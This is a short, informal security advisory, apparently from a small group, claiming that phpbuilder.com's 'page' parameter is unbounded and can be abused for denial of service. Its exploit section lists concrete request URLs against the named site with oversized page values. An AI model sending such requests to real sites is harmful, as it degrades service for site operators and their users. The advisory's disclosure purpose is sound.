recently, 01 security submission has discovered a serious problem with phpbuilder.com ---[ about phpbuilder.com ]--- phpbuilder.com is one of the premier php site. Thousand of developer share and contribute their articles on php. ---[summary]--- the bug actually allows any user to launch DOS attack! phpbuilder.com has not restricton in "page", making it possible to tie up all the connection slots and consume a lot of CPU on the server. --[exploit]-- change the page value!. http://www.phpbuilder.com/columns/mattias20000105.php3?page=1 viz, http://www.phpbuilder.com/columns/mattias20000105.php3?page=1333 what about this? http://www.phpbuilder.com/columns/mattias20000105.php3?page=13333 and wait for result. there is not restricton in "page" variable, so u can assign upto 2^32...r u mad? ---[about 01 security submission]--- 01s.s is a small group having experience as security specialists, programmers and system administrators http://www.ysgnet.com/hn.